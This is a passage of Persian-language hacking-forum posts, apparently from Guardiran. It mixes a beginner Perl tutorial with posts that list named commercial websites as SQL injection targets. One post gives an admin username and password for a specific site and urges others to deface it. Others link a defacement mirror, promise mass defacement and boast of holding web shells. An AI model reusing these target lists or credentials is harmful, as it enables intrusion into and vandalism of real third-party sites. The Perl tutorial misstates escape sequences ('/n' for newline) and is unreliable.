    باعذر خواهی از دوست عزیزمان که این مطالب کامل وجامع را قرار داده بودند بنده می خواهم مطالبی را اضافه کنم. بسته brace باز شروع می شوند و با يک brace بوسيله يک Perl بلوکهای برنامه های به زبان خاتمه می يابند . { statement_1; statemrnt_2; statemrnt_3; .... statement_n; } فرمتهای مختلف نمايش رشته : \n خط بعدی \t Tab پرش به جلو به اندازه يک \b به اندازه يک کاراکتر به عقب می رود نمايش \ \\ برای نمايش " در خروجی "\ \l lower case نمايش کاراکتر بعدی بصورت \L نمايش داده می شوند lower case بصورت \E تا \L کليه کاراکترهای بين \u upper case نمايش کاراکتر بعدی بصورت \U نمايش داده می شوند upperr case بصورت \E تا \L کليه کاراکترهای بين \E Terminate \L or \E : ___________________________________ نمايش بصورت کاراکتری s نمايش بصورت رشته ای s قسمت صحيح اعشار، اعداد گرد شده اند d عدد با نقطه شناور f
  42. 1 امتیاز
    با سلام همان طور که می دانید بنده در زمینه طراحی وب و برنامه نویسی کمی اطلاعات دارم و در زمینه هک هم اطلاعاتی دارم واگر نیاز بود آماده خدمت هستم
  43. 1 امتیاز
    خب دوستان تصمیم گرفتم از این به بعد اموزش هارو به صورت تصویری قرار بدم قسمت اول: شامل اموزش print و variable Perl 1.rar
  44. 1 امتیاز
    با سلام با اجازه دوستمون من یک سری توضیحات تکمیلی در رابطه با بخش اول آموزششون بدم ‏(هماهنگ شده) خط اول ما تو این برنامه با !# آغاز میشه این وعلامت فقط در خط اول هر برنامه در کنارهم استفاده می شه و در ادامه مسیر مفسر پرل را اعلام میکنه و به سیستم عامل میگه که وقتی این کد اجرا کردیم این مفسر اجرا شه ؛ شما میتونید تو هر سیستم عاملی که کار میکنید بعد از این دو تا کاراکتر آدرس محل قرارگیری مفسر رو به برنامتون بدهید اینجا محل قرار گیری پیشفرض پرل روی سیستم عامل لینوکس هست #!/usr/bin/perl خط دوم هم که همونطور که گفتن اگر بخوایم چیزی رو به عنوان یادداشت در کنار کد یا برای اون بخش کد ، عنوان بزاریم از # استفاده میکنیم که البته هیچ تاثییری هم در کد نداره و برای یادداشت گذاشتن هستحال برای چاپ یک متن از دستور print استفاده میکنیم ؛ به صورت print "Guardiran Security Team" نکته بعدی این که چطور بدون استفاده از enter لاین رو عوض کنیمبرای مثال اگر بخوایم بنویسیم Guardiran Security Team www.guardiran.org به احتمال زیاد دوستانی که در پرل تازه کار هستن اینگونه مینویسیند print "Guardiran Security Team" print "www.guardiran.org" اما با دستور /n میشه به راحتی لاین رو عوض کرد ؛ به صورت : print "Guardiran Security Team/nwww.guardiran.org پس یک فرم کلی از کد هایی که تا الان یاد گرفتید : #!/usr/bin/perl #Training Perl print "Guardiran Security Team/nwww.guardiran.org"
  45. 1 امتیاز
    صندوقتون پره!شل زیاد دارم ولی بیشترشون ثبت شدن
  46. 1 امتیاز
    http://leishna.com/products.php?id=8 http://www.pallynware.com/category-products.php?id=8 http://www.signmaxgift.com/products.php?id=8 http://www.nbjm-sprayer.com/products.php?id=8 http://www.magsolvics.com/products.php?id=8 http://www.starnetprinting.com/products.php?type=displays&id=8 http://www.powerleatherind.com/products.php?id=8
  47. 1 امتیاز
  48. 1 امتیاز
  49. 1 امتیاز
    icelord

    تارگت های Sql Injection

    سلام. http://www.sportphillip.com.au/category.php?id=&subcat=242 یوزر نیم:admin رمز:robertsonB7211 ادیمن پیج پیدا نکردم.اگه پیدا کردید به اسم ایران گارد دیفیس کنید.
  50. 1 امتیاز
    بعدی.... . http://www.aljyyosh.org/mirror.php?id=197530 . انشاا.. در مراحل بعدی با مس دیفیس MassDeface خواهم آمد . .